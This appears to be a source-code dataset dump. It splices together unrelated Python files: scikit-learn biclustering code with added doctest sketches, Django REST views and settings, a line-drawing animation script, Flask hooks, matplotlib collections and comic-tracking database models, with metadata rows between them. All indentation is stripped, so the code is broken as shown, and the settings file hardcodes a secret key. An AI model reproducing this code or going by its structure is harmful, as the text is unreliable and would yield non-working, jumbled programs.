from sklearn.utils.extmath import safe_sparse_dot
from sklearn.utils.extmath import make_nonnegative
from sklearn.utils.extmath import norm
from sklearn.utils.validation import assert_all_finite
from sklearn.utils.validation import check_array
from .utils import check_array_ndim
def _scale_normalize(X):
"""Normalize ``X`` by scaling rows and columns independently.
Returns the normalized matrix and the row and column scaling
factors.
"""
X = make_nonnegative(X)
row_diag = np.asarray(1.0 / np.sqrt(X.sum(axis=1))).squeeze()
col_diag = np.asarray(1.0 / np.sqrt(X.sum(axis=0))).squeeze()
row_diag = np.where(np.isnan(row_diag), 0, row_diag)
col_diag = np.where(np.isnan(col_diag), 0, col_diag)
if issparse(X):
n_rows, n_cols = X.shape
r = dia_matrix((row_diag, [0]), shape=(n_rows, n_rows))
c = dia_matrix((col_diag, [0]), shape=(n_cols, n_cols))
an = r * X * c
else:
an = row_diag[:, np.newaxis] * X * col_diag
return an, row_diag, col_diag
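# Editor's sketch, not part of the original sklearn source: the scaling above
# is D_r^{-1/2} * X * D_c^{-1/2}, where D_r and D_c hold the row and column
# sums of the (non-negative) matrix. Worked by hand for a small dense input:
#
#     >>> import numpy as np
#     >>> X = np.array([[1., 1.], [1., 3.]])
#     >>> r = 1.0 / np.sqrt(X.sum(axis=1))    # [1/sqrt(2), 1/2]
#     >>> c = 1.0 / np.sqrt(X.sum(axis=0))    # [1/sqrt(2), 1/2]
#     >>> r[:, np.newaxis] * X * c            # same as _scale_normalize(X)[0]
#     array([[ 0.5       ,  0.35355339],
#            [ 0.35355339,  0.75      ]])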
def _bistochastic_normalize(X, max_iter=1000, tol=1e-5):
"""Normalize rows and columns of ``X`` simultaneously so that all
rows sum to one constant and all columns sum to a different
constant.
"""
# According to paper, this can also be done more efficiently with
# deviation reduction and balancing algorithms.
X = make_nonnegative(X)
X_scaled = X
dist = None
for _ in range(max_iter):
X_new, _, _ = _scale_normalize(X_scaled)
if issparse(X):
            dist = norm(X_scaled.data - X_new.data)
else:
dist = norm(X_scaled - X_new)
X_scaled = X_new
if dist is not None and dist < tol:
break
return X_scaled
def _log_normalize(X):
"""Normalize ``X`` according to Kluger's log-interactions scheme."""
X = make_nonnegative(X, min_value=1)
if issparse(X):
raise ValueError("Cannot compute log of a sparse matrix,"
" because log(x) diverges to -infinity as x"
" goes to 0.")
L = np.log(X)
row_avg = L.mean(axis=1)[:, np.newaxis]
col_avg = L.mean(axis=0)
avg = L.mean()
return L - row_avg - col_avg + avg
class BaseSpectral(six.with_metaclass(ABCMeta, BaseEstimator,
BiclusterMixin)):
"""Base class for spectral biclustering."""
@abstractmethod
def __init__(self, n_clusters=3, svd_method="randomized",
n_svd_vecs=None, mini_batch=False, init="k-means++",
n_init=10, n_jobs=1, random_state=None):
self.n_clusters = n_clusters
self.svd_method = svd_method
self.n_svd_vecs = n_svd_vecs
self.mini_batch = mini_batch
self.init = init
self.n_init = n_init
self.n_jobs = n_jobs
self.random_state = random_state
def _check_parameters(self):
legal_svd_methods = ('randomized', 'arpack')
if self.svd_method not in legal_svd_methods:
raise ValueError("Unknown SVD method: '{0}'. svd_method must be"
" one of {1}.".format(self.svd_method,
legal_svd_methods))
def fit(self, X):
"""Creates a biclustering for X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
"""
X = check_array(X, accept_sparse='csr', dtype=np.float64)
check_array_ndim(X)
self._check_parameters()
self._fit(X)
def _svd(self, array, n_components, n_discard):
"""Returns first `n_components` left and right singular
vectors u and v, discarding the first `n_discard`.
"""
if self.svd_method == 'randomized':
kwargs = {}
if self.n_svd_vecs is not None:
kwargs['n_oversamples'] = self.n_svd_vecs
u, _, vt = randomized_svd(array, n_components,
random_state=self.random_state,
**kwargs)
elif self.svd_method == 'arpack':
u, _, vt = svds(array, k=n_components, ncv=self.n_svd_vecs)
if np.any(np.isnan(vt)):
# some eigenvalues of A * A.T are negative, causing
# sqrt() to be np.nan. This causes some vectors in vt
# to be np.nan.
_, v = eigsh(safe_sparse_dot(array.T, array),
ncv=self.n_svd_vecs)
vt = v.T
if np.any(np.isnan(u)):
_, u = eigsh(safe_sparse_dot(array, array.T),
ncv=self.n_svd_vecs)
assert_all_finite(u)
assert_all_finite(vt)
u = u[:, n_discard:]
vt = vt[n_discard:]
return u, vt.T
def _k_means(self, data, n_clusters):
if self.mini_batch:
model = MiniBatchKMeans(n_clusters,
init=self.init,
n_init=self.n_init,
random_state=self.random_state)
else:
model = KMeans(n_clusters, init=self.init,
n_init=self.n_init, n_jobs=self.n_jobs,
random_state=self.random_state)
model.fit(data)
centroid = model.cluster_centers_
labels = model.labels_
return centroid, labels
class SpectralCoclustering(BaseSpectral):
"""Spectral Co-Clustering algorithm (Dhillon, 2001).
Clusters rows and columns of an array `X` to solve the relaxed
normalized cut of the bipartite graph created from `X` as follows:
the edge between row vertex `i` and column vertex `j` has weight
`X[i, j]`.
The resulting bicluster structure is block-diagonal, since each
row and each column belongs to exactly one bicluster.
Supports sparse matrices, as long as they are nonnegative.
Parameters
----------
n_clusters : integer, optional, default: 3
The number of biclusters to find.
svd_method : string, optional, default: 'randomized'
Selects the algorithm for finding singular vectors. May be
'randomized' or 'arpack'. If 'randomized', use
:func:`sklearn.utils.extmath.randomized_svd`, which may be faster
for large matrices. If 'arpack', use
:func:`sklearn.utils.arpack.svds`, which is more accurate, but
possibly slower in some cases.
n_svd_vecs : int, optional, default: None
Number of vectors to use in calculating the SVD. Corresponds
to `ncv` when `svd_method=arpack` and `n_oversamples` when
`svd_method` is 'randomized`.
mini_batch : bool, optional, default: False
Whether to use mini-batch k-means, which is faster but may get
different results.
init : {'k-means++', 'random' or an ndarray}
Method for initialization of k-means algorithm; defaults to
'k-means++'.
n_init : int, optional, default: 10
Number of random initializations that are tried with the
k-means algorithm.
If mini-batch k-means is used, the best initialization is
chosen and the algorithm runs once. Otherwise, the algorithm
is run for each initialization and the best solution chosen.
n_jobs : int, optional, default: 1
The number of jobs to use for the computation. This works by breaking
down the pairwise matrix into n_jobs even slices and computing them in
parallel.
If -1 all CPUs are used. If 1 is given, no parallel computing code is
used at all, which is useful for debugging. For n_jobs below -1,
(n_cpus + 1 + n_jobs) are used. Thus for n_jobs = -2, all CPUs but one
are used.
random_state : int seed, RandomState instance, or None (default)
A pseudo random number generator used by the K-Means
initialization.
Attributes
----------
`rows_` : array-like, shape (n_row_clusters, n_rows)
Results of the clustering. `rows[i, r]` is True if
cluster `i` contains row `r`. Available only after calling ``fit``.
`columns_` : array-like, shape (n_column_clusters, n_columns)
Results of the clustering, like `rows`.
`row_labels_` : array-like, shape (n_rows,)
The bicluster label of each row.
`column_labels_` : array-like, shape (n_cols,)
The bicluster label of each column.
References
----------
* Dhillon, Inderjit S, 2001. `Co-clustering documents and words using
bipartite spectral graph partitioning
<http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.140.3011>`__.
"""
def __init__(self, n_clusters=3, svd_method='randomized',
n_svd_vecs=None, mini_batch=False, init='k-means++',
n_init=10, n_jobs=1, random_state=None):
super(SpectralCoclustering, self).__init__(n_clusters,
svd_method,
n_svd_vecs,
mini_batch,
init,
n_init,
n_jobs,
random_state)
def _fit(self, X):
normalized_data, row_diag, col_diag = _scale_normalize(X)
n_sv = 1 + int(np.ceil(np.log2(self.n_clusters)))
u, v = self._svd(normalized_data, n_sv, n_discard=1)
z = np.vstack((row_diag[:, np.newaxis] * u,
col_diag[:, np.newaxis] * v))
_, labels = self._k_means(z, self.n_clusters)
n_rows = X.shape[0]
self.row_labels_ = labels[:n_rows]
self.column_labels_ = labels[n_rows:]
self.rows_ = np.vstack(self.row_labels_ == c
for c in range(self.n_clusters))
self.columns_ = np.vstack(self.column_labels_ == c
for c in range(self.n_clusters))
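# Editor's sketch, not part of the original sklearn source: typical usage of
# SpectralCoclustering, written in the doctest style used elsewhere in this
# file. The import path assumes this module layout (sklearn.cluster.bicluster);
# newer releases expose the class directly under sklearn.cluster.
#
#     >>> import numpy as np
#     >>> from sklearn.cluster.bicluster import SpectralCoclustering
#     >>> X = np.array([[1, 1, 0, 0], [1, 1, 0, 0],
#     ...               [0, 0, 1, 1], [0, 0, 1, 1]])
#     >>> model = SpectralCoclustering(n_clusters=2, random_state=0)
#     >>> model.fit(X)                  # note: fit() returns None in this version
#     >>> model.row_labels_.shape, model.column_labels_.shape
#     ((4,), (4,))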
class SpectralBiclustering(BaseSpectral):
"""Spectral biclustering (Kluger, 2003).
Partitions rows and columns under the assumption that the data has
an underlying checkerboard structure. For instance, if there are
two row partitions and three column partitions, each row will
belong to three biclusters, and each column will belong to two
biclusters. The outer product of the corresponding row and column
label vectors gives this checkerboard structure.
Parameters
----------
n_clusters : integer or tuple (n_row_clusters, n_column_clusters)
The number of row and column clusters in the checkerboard
structure.
method : string, optional, default: 'bistochastic'
Method of normalizing and converting singular vectors into
biclusters. May be one of 'scale', 'bistochastic', or 'log'.
The authors recommend using 'log'. If the data is sparse,
however, log normalization will not work, which is why the
default is 'bistochastic'. CAUTION: if `method='log'`, the
data must not be sparse.
n_components : integer, optional, default: 6
Number of singular vectors to check.
n_best : integer, optional, default: 3
Number of best singular vectors to which to project the data
for clustering.
svd_method : string, optional, default: 'randomized'
Selects the algorithm for finding singular vectors. May be
'randomized' or 'arpack'. If 'randomized', uses
`sklearn.utils.extmath.randomized_svd`, which may be faster
for large matrices. If 'arpack', uses
`sklearn.utils.arpack.svds`, which is more accurate, but
possibly slower in some cases.
n_svd_vecs : int, optional, default: None
Number of vectors to use in calculating the SVD. Corresponds
to `ncv` when `svd_method=arpack` and `n_oversamples` when
`svd_method` is 'randomized`.
mini_batch : bool, optional, default: False
Whether to use mini-batch k-means, which is faster but may get
different results.
init : {'k-means++', 'random' or an ndarray}
Method for initialization of k-means algorithm; defaults to
'k-means++'.
n_init : int, optional, default: 10
Number of random initializations that are tried with the
k-means algorithm.
If mini-batch k-means is used, the best initialization is
chosen and the algorithm runs once. Otherwise, the algorithm
is run for each initialization and the best solution chosen.
n_jobs : int, optional, default: 1
The number of jobs to use for the computation. This works by breaking
down the pairwise matrix into n_jobs even slices and computing them in
parallel.
If -1 all CPUs are used. If 1 is given, no parallel computing code is
used at all, which is useful for debugging. For n_jobs below -1,
(n_cpus + 1 + n_jobs) are used. Thus for n_jobs = -2, all CPUs but one
are used.
random_state : int seed, RandomState instance, or None (default)
A pseudo random number generator used by the K-Means
initialization.
Attributes
----------
`rows_` : array-like, shape (n_row_clusters, n_rows)
Results of the clustering. `rows[i, r]` is True if
cluster `i` contains row `r`. Available only after calling ``fit``.
`columns_` : array-like, shape (n_column_clusters, n_columns)
Results of the clustering, like `rows`.
`row_labels_` : array-like, shape (n_rows,)
Row partition labels.
`column_labels_` : array-like, shape (n_cols,)
Column partition labels.
References
----------
* Kluger, Yuval, et. al., 2003. `Spectral biclustering of microarray
data: coclustering genes and conditions
<http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.135.1608>`__.
"""
def __init__(self, n_clusters=3, method='bistochastic',
n_components=6, n_best=3, svd_method='randomized',
n_svd_vecs=None, mini_batch=False, init='k-means++',
n_init=10, n_jobs=1, random_state=None):
super(SpectralBiclustering, self).__init__(n_clusters,
svd_method,
n_svd_vecs,
mini_batch,
init,
n_init,
n_jobs,
random_state)
self.method = method
self.n_components = n_components
self.n_best = n_best
def _check_parameters(self):
super(SpectralBiclustering, self)._check_parameters()
legal_methods = ('bistochastic', 'scale', 'log')
if self.method not in legal_methods:
raise ValueError("Unknown method: '{0}'. method must be"
" one of {1}.".format(self.method, legal_methods))
try:
int(self.n_clusters)
except TypeError:
try:
r, c = self.n_clusters
int(r)
int(c)
except (ValueError, TypeError):
raise ValueError("Incorrect parameter n_clusters has value:"
" {}. It should either be a single integer"
" or an iterable with two integers:"
" (n_row_clusters, n_column_clusters)")
if self.n_components < 1:
raise ValueError("Parameter n_components must be greater than 0,"
" but its value is {}".format(self.n_components))
if self.n_best < 1:
raise ValueError("Parameter n_best must be greater than 0,"
" but its value is {}".format(self.n_best))
if self.n_best > self.n_components:
raise ValueError("n_best cannot be larger than"
" n_components, but {} > {}"
"".format(self.n_best, self.n_components))
def _fit(self, X):
n_sv = self.n_components
if self.method == 'bistochastic':
normalized_data = _bistochastic_normalize(X)
n_sv += 1
elif self.method == 'scale':
normalized_data, _, _ = _scale_normalize(X)
n_sv += 1
elif self.method == 'log':
normalized_data = _log_normalize(X)
n_discard = 0 if self.method == 'log' else 1
u, v = self._svd(normalized_data, n_sv, n_discard)
ut = u.T
vt = v.T
try:
n_row_clusters, n_col_clusters = self.n_clusters
except TypeError:
n_row_clusters = n_col_clusters = self.n_clusters
best_ut = self._fit_best_piecewise(ut, self.n_best,
n_row_clusters)
best_vt = self._fit_best_piecewise(vt, self.n_best,
n_col_clusters)
self.row_labels_ = self._project_and_cluster(X, best_vt.T,
n_row_clusters)
self.column_labels_ = self._project_and_cluster(X.T, best_ut.T,
n_col_clusters)
self.rows_ = np.vstack(self.row_labels_ == label
for label in range(n_row_clusters)
for _ in range(n_col_clusters))
self.columns_ = np.vstack(self.column_labels_ == label
for _ in range(n_row_clusters)
for label in range(n_col_clusters))
def _fit_best_piecewise(self, vectors, n_best, n_clusters):
"""Find the ``n_best`` vectors that are best approximated by piecewise
constant vectors.
The piecewise vectors are found by k-means; the best is chosen
according to Euclidean distance.
"""
def make_piecewise(v):
centroid, labels = self._k_means(v.reshape(-1, 1), n_clusters)
return centroid[labels].ravel()
piecewise_vectors = np.apply_along_axis(make_piecewise,
axis=1, arr=vectors)
dists = np.apply_along_axis(norm, axis=1,
arr=(vectors - piecewise_vectors))
result = vectors[np.argsort(dists)[:n_best]]
return result
def _project_and_cluster(self, data, vectors, n_clusters):
"""Project ``data`` to ``vectors`` and cluster the result."""
projected = safe_sparse_dot(data, vectors)
_, labels = self._k_means(projected, n_clusters)
return labels
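# Editor's sketch, not part of the original sklearn source: SpectralBiclustering
# targets checkerboard-structured data, so a typical round trip pairs it with
# sklearn.datasets.make_checkerboard (import paths assumed as in releases of
# this era):
#
#     >>> from sklearn.datasets import make_checkerboard
#     >>> from sklearn.cluster.bicluster import SpectralBiclustering
#     >>> data, rows, cols = make_checkerboard(shape=(30, 30), n_clusters=(3, 2),
#     ...                                      noise=0.5, random_state=0)
#     >>> model = SpectralBiclustering(n_clusters=(3, 2), method='log',
#     ...                              random_state=0)
#     >>> model.fit(data)
#     >>> model.rows_.shape, model.columns_.shape   # 3 * 2 = 6 biclusters
#     ((6, 30), (6, 30))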
| bsd-3-clause | 3,698,149,455,247,156,700 | 38.554656 | 79 | 0.56607 | false | 4.068291 | false | false | false |
TangentMicroServices/BuildService | api/views.py | 1 | 2442 | from django.contrib.auth.models import User
from api.models import Build, Metric, Smell
from rest_framework import routers, serializers, viewsets, decorators, response
from api.permissions import IsSelfOrSuperUser
from api.serializers import BuildSerializer, MetricSerializer, SmellSerializer
from rest_framework.permissions import IsAuthenticated, AllowAny
# Serializers define the API representation.
class MetricViewSet(viewsets.ModelViewSet):
queryset = Metric.objects.all()
serializer_class = MetricSerializer
class BuildViewSet(viewsets.ModelViewSet):
queryset = Build.objects.all()
serializer_class = BuildSerializer
class SmellViewSet(viewsets.ModelViewSet):
queryset = Smell.objects.all()
serializer_class = SmellSerializer
class HealthViewSet(viewsets.ViewSet):
permission_classes = (AllowAny, )
def list(self, request, format=None):
# make sure we can connect to the database
all_statuses = []
status = "up"
db_status = self.__can_connect_to_db()
all_statuses.append(db_status)
if "down" in all_statuses:
status = "down"
data = {
"data": {
"explorer": "/api-explorer",
},
"status": {
"db": db_status,
"status": status
}
}
return response.Response(data)
def __can_connect_to_db(self):
try:
user = User.objects.first()
return "up"
except Exception:
return "down"
# Routers provide an easy way of automatically determining the URL conf.
router = routers.DefaultRouter()
router.register(r'health', HealthViewSet, base_name='health')
router.register(r'build', BuildViewSet, base_name='build')
router.register(r'metric', MetricViewSet, base_name='metric')
router.register(r'smell', SmellViewSet, base_name='smell')
"""
List all users.
**Notes:**
* Requires authenticated user
**Example usage:**
import requests
response = requests.get('/users/')
**Example response:**
[
{
"url": "http://192.168.99.100:8000/users/1/",
"username": "admin",
"email": "[email protected]",
"is_staff": true,
"first_name": "",
"last_name": ""
}
]
---
responseMessages:
- code: 403
message: Not authenticated
consumes:
- application/json
produces:
- application/json
""" | mit | 4,265,018,532,309,362,000 | 22.266667 | 79 | 0.63145 | false | 3.93871 | false | false | false |
inconvergent/differential-line | main_line_ani.py | 1 | 2648 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
from numpy import pi
# from numpy import cos
# from numpy import sin
from numpy.random import random
from numpy import zeros
# from numpy import linspace
from numpy import floor
from modules.growth import spawn_curl
NMAX = 10**6
SIZE = 512
ONE = 1./SIZE
PROCS = 2
INIT_NUM = 10
STP = ONE*0.1
NEARL = 4*ONE
FARL = 100*ONE
MID = 0.5
LINEWIDTH = 5.*ONE
BACK = [1,1,1,1]
FRONT = [0,0,0,0.05]
TWOPI = pi*2.
grains = 10
np_coords = zeros(shape=(NMAX,4), dtype='float')
np_vert_coords = zeros(shape=(NMAX,2), dtype='float')
def steps(df):
from time import time
from modules.helpers import print_stats
t1 = time()
df.optimize_position(STP)
spawn_curl(df, NEARL)
if df.safe_vertex_positions(3*STP)<0:
print('vertices reached the boundary. stopping.')
return False
t2 = time()
print_stats(0, t2-t1, df)
return True
def main():
from iutils.render import Animate
from differentialLine import DifferentialLine
from fn import Fn
from modules.show import sandstroke
from modules.show import dots
DF = DifferentialLine(NMAX, FARL*2, NEARL, FARL, PROCS)
## arc
# angles = sorted(random(INIT_NUM)*pi*1.5)
# xys = []
# for a in angles:
# x = 0.5 + cos(a)*0.06
# y = 0.5 + sin(a)*0.06
# xys.append((x,y))
# DF.init_line_segment(xys, lock_edges=1)
## vertical line
#xx = sorted(0.45+0.1*random(INIT_NUM))
#yy = MID+0.005*(0.5-random(INIT_NUM))
#xys = []
#for x,y in zip(xx,yy):
#xys.append((x,y))
#DF.init_line_segment(xys, lock_edges=1)
# diagonal line
# yy = sorted(0.3+0.4*random(INIT_NUM))
# xx = 0.3+linspace(0,0.4,num=INIT_NUM)
# xys = []
# for x,y in zip(xx,yy):
# xys.append((x,y))
# DF.init_line_segment(xys, lock_edges=1)
angles = sorted(random(INIT_NUM)*TWOPI)
DF.init_circle_segment(MID,MID,FARL*0.2, angles)
fn = Fn(prefix='./res/', postfix='.png')
def wrap(render):
global np_coords
global np_vert_coords
global grains
## if fn is a path each image will be saved to that path
if not render.steps%3:
f = fn.name()
else:
f = None
grains += (-1)**floor(2*random())
print(grains)
if grains<0:
grains = 0
res = steps(DF)
render.set_front(FRONT)
coord_num = DF.np_get_edges_coordinates(np_coords)
sandstroke(render,np_coords[:coord_num,:],grains,f)
if not random()<0.1:
vert_num = DF.np_get_vert_coordinates(np_vert_coords)
dots(render,np_vert_coords[:vert_num,:],None)
return res
render = Animate(SIZE, BACK, FRONT, wrap)
render.start()
if __name__ == '__main__':
main()
| mit | 5,529,219,206,050,234,000 | 17.262069 | 60 | 0.628021 | false | 2.713115 | false | false | false |
pastgift/seed-website-py | app/index/hooks.py | 1 | 1472 | # -*- coding: utf-8 -*-
from flask import render_template, request, jsonify, flash, g
from flask.ext.login import current_user
from . import index_blueprint
from .. import db
from .. import babel
from ..models import User
from datetime import datetime
@index_blueprint.before_app_request
def before_request():
if not request.user_agent.browser:
return
user_browser = request.user_agent.browser.lower()
if user_browser != 'chrome':
        # Do something for non-Chrome browsers (placeholder)
pass
@index_blueprint.after_app_request
def after_request(res):
# Record latest access
if current_user.is_authenticated:
current_user.ping()
return res
@babel.localeselector
def get_locale():
'''
Select Language Tag
'''
lang = request.cookies.get('lang', 'en')
# Uncomment to auto match language
# if not lang:
# lang = request.accept_languages.best_match(['zh_CN', 'zh_TW', 'ja'])
babel_lang_alias = {
'zh_CN': 'zh_Hans_CN',
'zh_TW': 'zh_Hant_TW',
'ja' : 'ja_JP',
# Add more languages
#'<Setting Name>': 'Babel Locale Name'
}
datepicker_lang_alias = {
'zh_CN': 'zh-CN',
'zh_TW': 'zh-TW',
# Add more languages
#'<Setting Name>': 'jQuery-datapicker Locale Name'
}
g.lang = lang
g.babel_lang = babel_lang_alias.get(lang, lang)
g.datepicker_lang = datepicker_lang_alias.get(lang, lang)
return g.babel_lang | mit | 1,368,370,693,941,926,000 | 23.147541 | 78 | 0.608696 | false | 3.431235 | false | false | false |
dean0x7d/pybinding | pybinding/support/collections.py | 1 | 3143 | import numpy as np
from matplotlib.collections import Collection
from matplotlib.artist import allow_rasterization
# noinspection PyAbstractClass
class CircleCollection(Collection):
"""Custom circle collection
The default matplotlib `CircleCollection` creates circles based on their
area in screen units. This class uses the radius in data units. It behaves
like a much faster version of a `PatchCollection` of `Circle`.
The implementation is similar to `EllipseCollection`.
"""
def __init__(self, radius, **kwargs):
super().__init__(**kwargs)
from matplotlib import path, transforms
self.radius = np.atleast_1d(radius)
self._paths = [path.Path.unit_circle()]
self.set_transform(transforms.IdentityTransform())
self._transforms = np.empty((0, 3, 3))
def _set_transforms(self):
ax = self.axes
self._transforms = np.zeros((self.radius.size, 3, 3))
self._transforms[:, 0, 0] = self.radius * ax.bbox.width / ax.viewLim.width
self._transforms[:, 1, 1] = self.radius * ax.bbox.height / ax.viewLim.height
self._transforms[:, 2, 2] = 1
@allow_rasterization
def draw(self, renderer):
self._set_transforms()
super().draw(renderer)
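# Editor's sketch, not part of the original pybinding source: because the
# radius is interpreted in data units, the circles rescale with the axes. A
# minimal usage sketch, assuming the standard matplotlib Collection keywords
# for positioning (offsets/transOffset):
#
#     >>> import numpy as np
#     >>> import matplotlib.pyplot as plt
#     >>> fig, ax = plt.subplots()
#     >>> xy = np.random.rand(20, 2)
#     >>> circles = CircleCollection(radius=0.03, offsets=xy,
#     ...                            transOffset=ax.transData,
#     ...                            facecolors='steelblue', edgecolors='none')
#     >>> ax.add_collection(circles)
#     >>> ax.set_xlim(0, 1), ax.set_ylim(0, 1)
#     >>> plt.show()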
class Circle3DCollection(CircleCollection):
def __init__(self, radius, zs=0, zdir='z', depthshade=True, **kwargs):
super().__init__(radius, **kwargs)
self._depthshade = depthshade
self.set_3d_properties(zs, zdir)
self._A0 = self._A
def set_array(self, array):
self._A0 = array
super().set_array(array)
def set_3d_properties(self, zs, zdir):
# Force the collection to initialize the face and edgecolors
# just in case it is a scalarmappable with a colormap.
self.update_scalarmappable()
offsets = self.get_offsets()
if len(offsets) > 0:
xs, ys = list(zip(*offsets))
else:
xs = []
ys = []
from mpl_toolkits.mplot3d.art3d import juggle_axes
self._offsets3d = juggle_axes(xs, ys, np.atleast_1d(zs), zdir)
self._facecolor3d = self.get_facecolor()
self._edgecolor3d = self.get_edgecolor()
def do_3d_projection(self, renderer):
from mpl_toolkits.mplot3d import proj3d
from mpl_toolkits.mplot3d.art3d import zalpha
from matplotlib import colors as mcolors
# transform and sort in z direction
v = np.array(proj3d.proj_transform_clip(*self._offsets3d, M=renderer.M)[:3])
idx = v[2].argsort()[::-1]
vzs = v[2, idx]
self.set_offsets(v[:2, idx].transpose())
super().set_array(self._A0[idx])
fcs = zalpha(self._facecolor3d, vzs) if self._depthshade else self._facecolor3d
fcs = mcolors.colorConverter.to_rgba_array(fcs, self._alpha)
self.set_facecolors(fcs)
ecs = zalpha(self._edgecolor3d, vzs) if self._depthshade else self._edgecolor3d
ecs = mcolors.colorConverter.to_rgba_array(ecs, self._alpha)
self.set_edgecolors(ecs)
return min(vzs) if vzs.size > 0 else np.nan
| bsd-2-clause | 452,870,017,756,134,800 | 36.416667 | 87 | 0.634108 | false | 3.575654 | false | false | false |
KenleyArai/ComicbookTime | app/models.py | 1 | 4953 | from app import db
from flask.ext.security import RoleMixin
from datetime import datetime
# Defining the table for the many-to-many relationship of User and Comic
bought_comics = db.Table('bought',
db.Column('user_id', db.Integer, db.ForeignKey('user.id')),
db.Column('comic_id', db.Integer, db.ForeignKey('comic.id')),
)
follows_series = db.Table('follows',
db.Column('user_id', db.Integer, db.ForeignKey('user.id')),
db.Column('series_id', db.Integer, db.ForeignKey('series.id')),
)
created = db.Table('created_comic',
db.Column('creator_id', db.Integer, db.ForeignKey('creator.id')),
db.Column('comic_id', db.Integer, db.ForeignKey('comic.id')),
)
# Define models
roles_users = db.Table('roles_users',
db.Column('user_id', db.Integer(), db.ForeignKey('user.id')),
db.Column('role_id', db.Integer(), db.ForeignKey('role.id')))
class Role(db.Model, RoleMixin):
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(80), unique=True)
description = db.Column(db.String(255))
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
google_id = db.Column(db.String, unique=True)
# many to many: A user can have many comics
bought_comics = db.relationship('Comic',
secondary=bought_comics,
backref=db.backref('users', lazy='dynamic'),
order_by='Comic.series_id')
follows_series = db.relationship('Series',
secondary=follows_series,
backref=db.backref('users', lazy='dynamic'))
roles = db.relationship('Role',
secondary=roles_users,
backref=db.backref('users', lazy='dynamic'))
connections = db.relationship('Connection',
backref=db.backref('user', lazy='joined'),
cascade="all", uselist=False)
active = False
def is_active(self):
return True
def get_id(self):
return self.id
def is_authenticated(self):
return True
def is_anonymous(self):
return False
def __init__(self, google_id, active, roles):
self.google_id = google_id
self.active = active
self.roles = roles
def __repr__(self):
return "<Google ID {}>".format(self.google_id)
class Connection(db.Model):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
provider_id = db.Column(db.String(255))
full_name = db.Column(db.String(255))
provider_user_id = db.Column(db.String(255))
access_token = db.Column(db.String(255))
secret = db.Column(db.String(255))
display_name = db.Column(db.String(255))
profile_url = db.Column(db.String(512))
image_url = db.Column(db.String(512))
rank = db.Column(db.Integer)
class Series(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String, unique=True)
comics = db.relationship('Comic', backref='Series',lazy='dynamic')
def __init__(self,title,comics):
self.title = title
self.comics = comics
def __repr__(self):
return "{}".format(self.title)
class Comic(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String, unique=True)
source_url = db.Column(db.String)
image_link = db.Column(db.String)
release_date = db.Column(db.DateTime)
series_id = db.Column(db.Integer, db.ForeignKey('series.id'))
def __init__(self, title, source_url, image_link, release_date):
self.title = title
self.source_url = source_url
self.image_link = image_link
self.release_date = release_date
def is_avail(self):
return self.release_date < datetime.now()
def get_dict(self):
return {'id': self.id,
'title': self.title,
'source_url': self.source_url,
'image_link': self.image_link,
'release_date': datetime.date(self.release_date).isoformat(),
'series_id': self.series_id,
'avail': self.is_avail()}
def __repr__(self):
data = self.get_dict()
return "<Title:{title}><Source Url:{source_url}><Image Link:{image_link}><Release Date:{release_date}>".format(**data)
class Creator(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String, unique=True)
created_comics = db.relationship('Comic',
secondary=created,
backref=db.backref('creator', lazy='dynamic'))
| mit | -8,246,468,935,077,410,000 | 35.153285 | 126 | 0.566727 | false | 3.752273 | false | false | false |
HackerDom/qoala | qoala/settings/common.py | 1 | 4599 | # -*- coding: utf-8 -*-
"""
Django settings for qoala project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import sys
from django.conf import global_settings
# https://stackoverflow.com/a/21693784/6832066
TEMPLATE_CONTEXT_PROCESSORS = global_settings.TEMPLATE_CONTEXT_PROCESSORS + [
"django.core.context_processors.request",
]
PROJECT_DIR = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
BASE_DIR = os.path.dirname(PROJECT_DIR)
DATA_SUFFIX = os.environ.get('DATA_SUFFIX', '')
DATA_DIR = os.path.join(BASE_DIR, 'data' + DATA_SUFFIX)
TASKS_DIR = os.path.join(DATA_DIR, 'tasks')
TASKS_DATA_DIR = os.path.join(DATA_DIR, 'tmptasks')
INSTANCE_NAME = 'Qoala'
# App/Library Paths
sys.path.append(os.path.join(BASE_DIR, 'apps'))
sys.path.append(os.path.join(BASE_DIR, 'lib'))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '3tqlw0=fqml%ivszvim&8)$(%&#_69cmulxm-4ai-fib9=+#%*'
# Salt for generating task patterns
TASK_SALT = "asdkajdlkasjdlkajsdlkajlskdjalksdjkl"
ANSWERS_PER_MINUTE = 30
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
TEMPLATE_DEBUG = False
# Is this a development instance? Set this to True on development/master
# instances and False on stage/prod.
DEV = False
ALLOWED_HOSTS = []
AUTH_USER_MODEL = "teams.Team"
AUTHENTICATION_BACKENDS = ('django.contrib.auth.backends.ModelBackend', 'teams.auth.TokenAuthBackend')
LOGIN_REDIRECT_URL = '/'
LOGIN_URL = '/teams/login'
LOGOUT_URL = '/teams/logout'
SHOW_ZEROS_ON_SCOREBOARD = True
# Application definition
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.admin',
'django.contrib.humanize',
'django.contrib.staticfiles',
# Third-party apps, patches, fixes
'djcelery',
# Database migrations
# 'south',
# Global context
'base',
# Own apps
'teams',
'quests',
'board'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
